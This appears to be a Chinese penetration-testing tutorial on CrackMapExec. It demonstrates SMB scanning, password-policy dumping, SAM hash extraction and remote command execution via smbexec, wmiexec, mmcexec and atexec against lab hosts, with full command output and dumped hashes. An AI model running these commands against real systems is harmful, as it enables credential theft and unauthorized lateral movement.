Micro8
专注APT攻击与防御
Search…
前言
Preface
目录
第一章:生
1-10课
11-20课
21-30课
31-40课
41-50课
51-60课
61-70课
71-80课
81-90课
91-100课
第九十一课:从目标文件中做信息搜集第一季
第九十二课:实战中的Payload应用
第九十三课:与CrackMapExec结合攻击
第九十四课:基于实战中的small payload
第九十五课:基于Portfwd端口转发
第九十六课:HTTP隧道ABPTTS第一季
第九十七课:MSF配置自定义Payload控制目标主机权限
第九十八课:HTTP隧道reGeorg第二季
第九十九课:HTTP隧道Tunna第三季
第一百课:HTTP隧道reDuh第四季
第二章:老(待更新...)
第三章:病(待更新...)
Powered By GitBook
第九十三课:与CrackMapExec结合攻击
注:请多喝点热水或者凉白开,可预防肾结石,痛风等。
CrackMapExec弥补了MSF4下auxiliary,scanner模块下的Command执行方式,但MSF5已解决该问题。在MSF4下,该框架针对后渗透的横向移动经常出现,虽然MSF5已解决该问题,但该框架在配合bloodhound与empire依然目前有一定优势。
安装方式:from Wiki:

Kali:

1
apt‐get install crackmapexec
Copied!
但作者推荐pipenv安装:
1
apt‐get install ‐y libssl‐dev libffi‐dev python‐dev build‐essential
2
pip install ‐‐user pipenv
3
git clone ‐‐recursive https://github.com/byt3bl33d3r/CrackMapExec
4
cd CrackMapExec && pipenv install
5
pipenv shell
6
python setup.py install
Copied!

Mac OSX:

1
pip install ‐‐user crackmapexec
Copied!
默认为100线程
1
cme smb 192.168.1.0/24
2
SMB 192.168.1.4 445 JOHN‐PC [*] Windows 7 Ultimate 7601 Service Pack 1
3
x64 (name:JOHN‐PC) (domain:JOHN‐PC) (signing:False) (SMBv1:True)
4
SMB 192.168.1.119 445 WIN03X64 [*] Windows Server 2003 R2 3790 Service
5
Pack 2 x32 (name:WIN03X64) (domain:WIN03X64) (signing:False) (SMBv1:True)
Copied!
密码策略
1
[email protected]:~# cme smb 192.168.1.119 ‐u administrator ‐p '123456' ‐‐pass ‐pol
2
SMB 192.168.1.119 445 WIN03X64 [*] Windows Server 2003 R2 3790 Service
3
Pack 2 x32 (name:WIN03X64) (domain:WIN03X64) (signing:False) (SMBv1:True)
4
SMB 192.168.1.119 445 WIN03X64 [+] WIN03X64\administrator:123456 (Pwn3d!)
5
SMB 192.168.1.119 445 WIN03X64 [+] Dumping password info for domain: WIN03X64
6
SMB 192.168.1.119 445 WIN03X64 Minimum password length: None
7
SMB 192.168.1.119 445 WIN03X64 Password history length: None
8
SMB 192.168.1.119 445 WIN03X64 Maximum password age: 42 days 22 hours 47 minutes
9
SMB 192.168.1.119 445 WIN03X64
10
SMB 192.168.1.119 445 WIN03X64 Password Complexity Flags: 000000
11
SMB 192.168.1.119 445 WIN03X64 Domain Refuse Password Change: 0
12
SMB 192.168.1.119 445 WIN03X64 Domain Password Store Cleartext: 0
13
SMB 192.168.1.119 445 WIN03X64 Domain Password Lockout Admins: 0
14
SMB 192.168.1.119 445 WIN03X64 Domain Password No Clear Change: 0
15
SMB 192.168.1.119 445 WIN03X64 Domain Password No Anon Change: 0
16
SMB 192.168.1.119 445 WIN03X64 Domain Password Complex: 0
17
SMB 192.168.1.119 445 WIN03X64
18
SMB 192.168.1.119 445 WIN03X64 Minimum password age: None
19
SMB 192.168.1.119 445 WIN03X64 Reset Account Lockout Counter: 30 minutes
20
SMB 192.168.1.119 445 WIN03X64 Locked Account Duration: 30 minutes
21
SMB 192.168.1.119 445 WIN03X64 Account Lockout Threshold: None
22
SMB 192.168.1.119 445 WIN03X64 Forced Log off Time: Not Set
Copied!
list hash
1
[email protected]:~# cme smb 192.168.1.119 ‐u administrator ‐p '123456' ‐‐sam
2
SMB 192.168.1.119 445 WIN03X64 [*] Windows Server 2003 R2 3790 Service
3
Pack 2 x32 (name:WIN03X64) (domain:WIN03X64) (signing:False) (SMBv1:True)
4
SMB 192.168.1.119 445 WIN03X64 [+] WIN03X64\administrator:123456 (Pwn3d!)
5
SMB 192.168.1.119 445 WIN03X64 [+] Dumping SAM hashes
6
SMB 192.168.1.119 445 WIN03X64 Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
7
SMB 192.168.1.119 445 WIN03X64 Guest:501:aad3b435b51404eeaad3b435b51404ee:67f33d2095bda39fbf6b63fbadf2313a:::
8
SMB 192.168.1.119 445 WIN03X64 SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:f4d13c67c7608094c9b0e39147f07520:::
9
SMB 192.168.1.119 445 WIN03X64 IUSR_WIN03X64:1003:dbec20afefb6cc332311fb9822ba61ce:68c22a11c400d91fa4f66ff36b3c15dc:::
10
SMB 192.168.1.119 445 WIN03X64 IWAM_WIN03X64:1004:ff783381e4e022de176c59bf598409c7:7e456daac229ddceccf5f367aa69a487:::
11
SMB 192.168.1.119 445 WIN03X64 ASPNET:1008:cc26551b70faffc095feb73db16b65ff:fec6e9e4a08319a1f62cd30447247f88:::
12
SMB 192.168.1.119 445 WIN03X64 [+] Added 6 SAM hashes to the database
Copied!
枚举组
1
[email protected]:~# cme smb 192.168.1.119 ‐u administrator ‐p '123456' ‐‐local‐groups
2
SMB 192.168.1.119 445 WIN03X64 [\*] Windows Server 2003 R2 3790 Service
3
Pack 2 x32 (name:WIN03X64) (domain:WIN03X64) (signing:False) (SMBv1:True)
4
SMB 192.168.1.119 445 WIN03X64 [+] WIN03X64\administrator:123456 (Pwn3d!)
5
SMB 192.168.1.119 445 WIN03X64 [+] Enumerated local groups
6
SMB 192.168.1.119 445 WIN03X64 HelpServicesGroup membercount: 1
7
SMB 192.168.1.119 445 WIN03X64 IIS_WPG membercount: 4
8
SMB 192.168.1.119 445 WIN03X64 TelnetClients membercount: 0
9
SMB 192.168.1.119 445 WIN03X64 Administrators membercount: 1
10
SMB 192.168.1.119 445 WIN03X64 Backup Operators membercount: 0
11
SMB 192.168.1.119 445 WIN03X64 Distributed COM Users membercount: 0
12
SMB 192.168.1.119 445 WIN03X64 Guests membercount: 2
13
SMB 192.168.1.119 445 WIN03X64 Network Configuration Operators membercount: 0
14
SMB 192.168.1.119 445 WIN03X64 Performance Log Users membercount: 1
15
SMB 192.168.1.119 445 WIN03X64 Performance Monitor Users membercount: 0
16
SMB 192.168.1.119 445 WIN03X64 Power Users membercount: 0
17
SMB 192.168.1.119 445 WIN03X64 Print Operators membercount: 0
18
SMB 192.168.1.119 445 WIN03X64 Remote Desktop Users membercount: 0
19
SMB 192.168.1.119 445 WIN03X64 Replicator membercount: 0
20
SMB 192.168.1.119 445 WIN03X64 Users membercount: 3
Copied!
分别支持4种执行Command,如无--exec-method执行,默认为wmiexec执行。
    mmcexec
    smbexec
    wmiexec
    atexec
基于smbexec执行Command
1
[email protected]:~# cme smb 192.168.1.6 ‐u administrator ‐p '123456' ‐‐exec‐method smbexec ‐x 'net user'
2
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S [*] Windows Web Server 2008 R2 760
3
0 x64 (name:WIN‐5BMI9HGC42S) (domain:WIN‐5BMI9HGC42S) (signing:False) (SMBv1:True)
4
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S [+] WIN‐
5
5BMI9HGC42S\administrator:123456 (Pwn3d!)
6
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S [+] Executed command via smbexec
7
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S \\ ���û��ʻ�
8
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S
9
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐
10
‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐
11
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S Administrator Guest
12
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S ����������ϣ�������һ����������
Copied!
基于dcom执行Command
1
root\@John:\~\# cme smb 192.168.1.6 ‐u administrator ‐p '123456' ‐‐exec‐method mmcexec ‐x 'whoami'
2
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S [*] Windows Web Server 2008 R2 760
3
0 x64 (name:WIN‐5BMI9HGC42S) (domain:WIN‐5BMI9HGC42S) (signing:False) (SMBv1:True)
4
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S [+] WIN‐
5
5BMI9HGC42S\administrator:123456 (Pwn3d!)
6
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S [+] Executed command via mmcexec
7
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S win‐5bmi9hgc42s\administrator
Copied!
基于wmi执行Command
1
[email protected]:~# cme smb 192.168.1.6 ‐u administrator ‐p '123456' ‐‐exec‐method wmiexec ‐x 'whoami'
2
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S [*] Windows Web Server 2008 R2 760
3
0 x64 (name:WIN‐5BMI9HGC42S) (domain:WIN‐5BMI9HGC42S) (signing:False) (SMBv1:True)
4
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S [+] WIN‐
5
5BMI9HGC42S\\administrator:123456 (Pwn3d!)
6
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S [+] Executed command via wmiexec
7
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S win‐5bmi9hgc42s\administrator
Copied!
基于AT执行Command
目标机:无运行calc进程
1
[email protected]:~# cme smb 192.168.1.6 ‐u administrator ‐p '123456' ‐‐exec‐method atexec ‐x 'calc'
2
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S [*] Windows Web Server 2008 R2 760
3
0 x64 (name:WIN‐5BMI9HGC42S) (domain:WIN‐5BMI9HGC42S) (signing:False) (SMBv1:True)
4
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S [+] WIN‐
5
5BMI9HGC42S\administrator:123456 (Pwn3d!)
6
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S [+] Executed command via atexec
Copied!
默认采取wmiexec执行Command,参数为-x
1
[email protected]:~# cme smb 192.168.1.6 ‐u administrator ‐p '123456' ‐x 'whoami'
2
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S [*] Windows Web Server 2008 R2 760
3
0 x64 (name:WIN‐5BMI9HGC42S) (domain:WIN‐5BMI9HGC42S) (signing:False) (SMBv1:True)
4
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S [+] WIN‐
5
5BMI9HGC42S\administrator:123456 (Pwn3d!)
6
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S [+] Executed command
7
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S win‐5bmi9hgc42s\administrator
Copied!
枚举目标机disk
1
[email protected]:~# cme smb 192.168.1.6 ‐u administrator ‐p '123456' ‐‐disks
2
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S [*] Windows Web Server 2008 R2 760
3
0 x64 (name:WIN‐5BMI9HGC42S) (domain:WIN‐5BMI9HGC42S) (signing:False) (SMBv1:True)
4
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S [+] WIN‐
5
5BMI9HGC42S\\administrator:123456 (Pwn3d!)
6
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S [+] Enumerated disks
7
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S C:
8
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S D:
9
SMB 192.168.1.6 445 WIN‐5BMI9HGC42S E:
Copied!

附录:

解决出现:STATUS_PIPE_DISCONNECTED
改成经典
解决出现错误:UnicodeDecodeError:
升级impacket
Micropoor
Previous
第九十二课:实战中的Payload应用
Next
第九十四课:基于实战中的small payload
Last modified 2yr ago
Copy link
Contents
Kali:
Mac OSX:
附录: